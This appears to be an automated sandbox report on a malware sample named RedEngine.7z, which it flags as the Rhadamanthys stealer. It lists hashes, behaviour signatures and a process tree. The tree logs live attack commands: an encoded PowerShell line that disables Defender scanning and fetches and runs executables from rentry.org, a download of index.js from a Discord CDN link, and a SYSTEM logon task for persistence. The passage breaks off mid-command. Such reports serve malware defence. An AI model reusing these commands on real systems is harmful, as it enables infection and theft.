Analysis
-
max time kernel
1800s -
max time network
1692s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
25-06-2024 11:36
General
-
Target
RedEngine.7z
-
Size
2.1MB
-
MD5
f23bd725bb53925599f4be868442b6c9
-
SHA1
f1ceddaa54428a8b8bca7b08cc845b19e2ae14e2
-
SHA256
c1c897fccbac99e89d7dcfaecb8a97bcfe6250f9ab1160f190717ef1cfcb4258
-
SHA512
2b7160ca5605f19fd084e326b291a8015ac155b183315e0a9a14f115205fc85ae00216e163ec453db86a4d362b1d5c3383b08c9cd53245c5ae69e850183ad184
-
SSDEEP
49152:K0DnX8iIxVA3ooy+ZwawT1o1SU6cCxD+f7bGSFJw7iIehWD3u70xeHR:vDX8iI4Yoy+cK/lvsOInru70AR
Malware Config
Extracted
https://rentry.org/pancek61111111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Blocklisted process makes network request 29 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 46 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 59 IoCs
-
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 31 IoCs
-
Modifies registry class 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 26 IoCs
-
Suspicious use of UnmapMainImage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RedEngine.7z2⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd4ef3ab58,0x7ffd4ef3ab68,0x7ffd4ef3ab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4624 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4912 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4488 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4276 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3372 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2488 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4988 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5228 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5308 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3300 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Users\Admin\Downloads\7z2407-x64.exe"C:\Users\Admin\Downloads\7z2407-x64.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=848 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5152 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5560 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5568 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5824 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 --field-trial-handle=1920,i,1436669743675606779,13448776659065591083,131072 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RedEngine\" -spe -an -ai#7zMap15531:78:7zEvent218162⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RedEngine.7z"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\yyarru0m.1at0.exe"C:\Users\Admin\AppData\Roaming\yyarru0m.1at0.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\yyarru0m.1at1.exe"C:\Users\Admin\AppData\Roaming\yyarru0m.1at1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\yyarru0m.1at2.exe"C:\Users\Admin\AppData\Roaming\yyarru0m.1at2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42F1.tmp\42F2.tmp\42F3.bat C:\Users\Admin\AppData\Roaming\yyarru0m.1at2.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
F:\RedEngine\Launcher.exe"F:\RedEngine\Launcher.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAK